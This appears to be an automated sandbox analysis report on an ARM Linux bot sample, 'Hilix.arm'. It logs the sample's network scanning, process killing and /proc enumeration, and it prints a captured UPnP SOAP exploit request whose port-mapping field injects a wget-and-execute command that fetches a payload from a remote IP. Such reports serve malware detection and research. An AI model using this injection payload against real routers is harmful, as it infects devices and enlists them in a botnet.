Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::0	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::80	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /usr/sbin/sshd (PID: 5290)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5290)	Socket: [::]::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5405)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5405)	Socket: [::]::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5409)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5409)	Socket: [::]::22	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.76.255.51
Source: unknown	TCP traffic detected without corresponding DNS query: 130.107.169.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.40.204.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.249.102.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.240.159.175
Source: unknown	TCP traffic detected without corresponding DNS query: 47.111.154.51
Source: unknown	TCP traffic detected without corresponding DNS query: 206.190.187.173
Source: unknown	TCP traffic detected without corresponding DNS query: 207.73.204.91
Source: unknown	TCP traffic detected without corresponding DNS query: 178.22.94.37
Source: unknown	TCP traffic detected without corresponding DNS query: 72.89.198.59
Source: unknown	TCP traffic detected without corresponding DNS query: 87.109.145.122
Source: unknown	TCP traffic detected without corresponding DNS query: 111.123.168.204
Source: unknown	TCP traffic detected without corresponding DNS query: 205.158.216.218
Source: unknown	TCP traffic detected without corresponding DNS query: 90.236.105.87
Source: unknown	TCP traffic detected without corresponding DNS query: 68.17.237.89
Source: unknown	TCP traffic detected without corresponding DNS query: 90.175.99.196
Source: unknown	TCP traffic detected without corresponding DNS query: 201.249.219.84
Source: unknown	TCP traffic detected without corresponding DNS query: 76.153.162.22
Source: unknown	TCP traffic detected without corresponding DNS query: 144.115.24.118
Source: unknown	TCP traffic detected without corresponding DNS query: 172.131.131.149
Source: unknown	TCP traffic detected without corresponding DNS query: 186.227.221.235
Source: unknown	TCP traffic detected without corresponding DNS query: 211.247.213.135
Source: unknown	TCP traffic detected without corresponding DNS query: 94.246.130.177
Source: unknown	TCP traffic detected without corresponding DNS query: 94.87.126.146
Source: unknown	TCP traffic detected without corresponding DNS query: 136.117.212.181
Source: unknown	TCP traffic detected without corresponding DNS query: 70.111.187.139
Source: unknown	TCP traffic detected without corresponding DNS query: 25.151.1.67
Source: unknown	TCP traffic detected without corresponding DNS query: 101.47.81.22
Source: unknown	TCP traffic detected without corresponding DNS query: 189.33.223.115
Source: unknown	TCP traffic detected without corresponding DNS query: 180.20.33.84
Source: unknown	TCP traffic detected without corresponding DNS query: 101.220.60.178
Source: unknown	TCP traffic detected without corresponding DNS query: 91.225.175.161
Source: unknown	TCP traffic detected without corresponding DNS query: 140.121.105.248
Source: unknown	TCP traffic detected without corresponding DNS query: 179.130.250.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.178.137.80
Source: unknown	TCP traffic detected without corresponding DNS query: 206.79.248.139
Source: unknown	TCP traffic detected without corresponding DNS query: 192.119.104.193
Source: unknown	TCP traffic detected without corresponding DNS query: 106.48.18.132
Source: unknown	TCP traffic detected without corresponding DNS query: 167.67.17.20
Source: unknown	TCP traffic detected without corresponding DNS query: 119.0.43.124
Source: unknown	TCP traffic detected without corresponding DNS query: 61.105.100.27
Source: unknown	TCP traffic detected without corresponding DNS query: 160.169.168.12
Source: unknown	TCP traffic detected without corresponding DNS query: 208.171.231.169
Source: unknown	TCP traffic detected without corresponding DNS query: 139.38.50.3
Source: unknown	TCP traffic detected without corresponding DNS query: 130.49.43.226
Source: unknown	TCP traffic detected without corresponding DNS query: 97.251.125.56
Source: unknown	TCP traffic detected without corresponding DNS query: 105.222.81.117
Source: unknown	TCP traffic detected without corresponding DNS query: 140.213.57.236
Source: unknown	TCP traffic detected without corresponding DNS query: 35.184.212.252
Source: unknown	TCP traffic detected without corresponding DNS query: 209.209.33.198

Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

System Summary:

Sample tries to kill many processes (SIGKILL)

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful	Jump to behavior

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful	Jump to behavior

Source: classification engine

Classification label: mal76.spre.troj.linARM@0/6@0/0

Source: Hilix.arm

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/793/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/772/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/796/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/774/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/797/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/777/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/799/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/658/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/936/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/785/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/720/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/721/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/788/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/789/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/847/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/904/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5267/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5146/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5268/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5389/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5259/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5139/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5272/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5151/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5273/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5274/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5275/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5154/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5276/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5277/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5278/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5279/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
